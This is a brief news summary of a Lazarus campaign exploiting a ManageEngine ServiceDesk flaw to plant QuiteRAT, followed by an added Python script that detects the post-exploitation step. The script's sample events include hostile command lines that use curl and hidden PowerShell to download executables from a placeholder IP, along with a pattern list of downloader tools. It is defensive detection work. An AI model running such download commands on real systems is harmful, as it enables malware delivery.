Lazarus Exploits ManageEngine to Deploy QuiteRAT
The North Korean state-sponsored Lazarus APT group has launched a new campaign targeting internet backbone infrastructure and healthcare organizations in Europe and the U.S. Cisco Talos reported that the attackers began by exploiting a vulnerability in ManageEngine ServiceDesk (CVE-2022-47966) as early as January, a mere five days after its disclosure.

Diving into details

Lazarus used the exploit to gain initial access, immediately downloading and executing a malicious binary through the Java runtime process, which launched the implant on the compromised server. This binary is a modified version of the group's MagicRAT malware, dubbed QuiteRAT. In this campaign the Lazarus Group has also introduced a new malware named CollectionRAT, a RAT capable of executing arbitrary commands on a compromised system. Furthermore, security researchers could establish a conne...
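The post-exploitation step described above (the ManageEngine Java runtime fetching and launching a binary) is a process-lineage pattern defenders can hunt for. The following is an added example, not code from the Talos report or from any vendor; the ManageEngine install path, the Sysmon-style field names and the log events are all constructed assumptions.

```python
"""Flag the behaviour reported for the Lazarus/ManageEngine intrusions:
the ServiceDesk Java runtime spawning a shell or download utility whose
command line references a URL. Events below are constructed samples
(Sysmon-style fields), not real telemetry."""
import re

# Constructed sample process-creation events: parent image, child image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\ManageEngine\ServiceDesk\jre\bin\java.exe",          # assumed install path
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl -o C:\Windows\Temp\svc.exe http://198.51.100.10/svc.exe"},
    {"parent": r"C:\ManageEngine\ServiceDesk\jre\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c (New-Object Net.WebClient)"
                ".DownloadFile('http://198.51.100.10/a','C:\\Users\\Public\\a.exe')"},
    {"parent": r"C:\ManageEngine\ServiceDesk\jre\bin\java.exe",          # benign: service wrapper
     "image": r"C:\ManageEngine\ServiceDesk\bin\wrapper.exe",
     "cmdline": r"wrapper.exe -s ..\conf\wrapper.conf"},
    {"parent": r"C:\Windows\explorer.exe",                                 # benign: user-driven curl
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c curl https://example.org"},
]

# Java runtime living under a ManageEngine install (path fragment is an assumption).
MANAGEENGINE_JAVA = re.compile(r"manageengine.*\\javaw?\.exe$", re.I)
# Shells and built-in utilities commonly used to fetch and launch a payload.
DOWNLOAD_OR_EXEC = re.compile(
    r"(curl|certutil|bitsadmin|powershell|cmd|wget|mshta|rundll32)\.exe$", re.I)
URL_IN_CMDLINE = re.compile(r"https?://", re.I)


def is_suspicious(event):
    """True when a ManageEngine Java process spawns a shell/downloader
    and the child's command line references a URL (the download-then-run step)."""
    if not MANAGEENGINE_JAVA.search(event["parent"]):
        return False
    if not DOWNLOAD_OR_EXEC.search(event["image"]):
        return False
    return bool(URL_IN_CMDLINE.search(event["cmdline"]))


def find_suspicious(events):
    """Return only the events matching the exploitation-follow-on pattern."""
    return [e for e in events if is_suspicious(e)]


if __name__ == "__main__":
    for e in find_suspicious(SAMPLE_EVENTS):
        print("ALERT:", e["cmdline"])
```

The lineage check (Java under the ManageEngine path as parent) is what separates this from ordinary admin use of curl or PowerShell; tune the path fragment to the product's real install location in your environment.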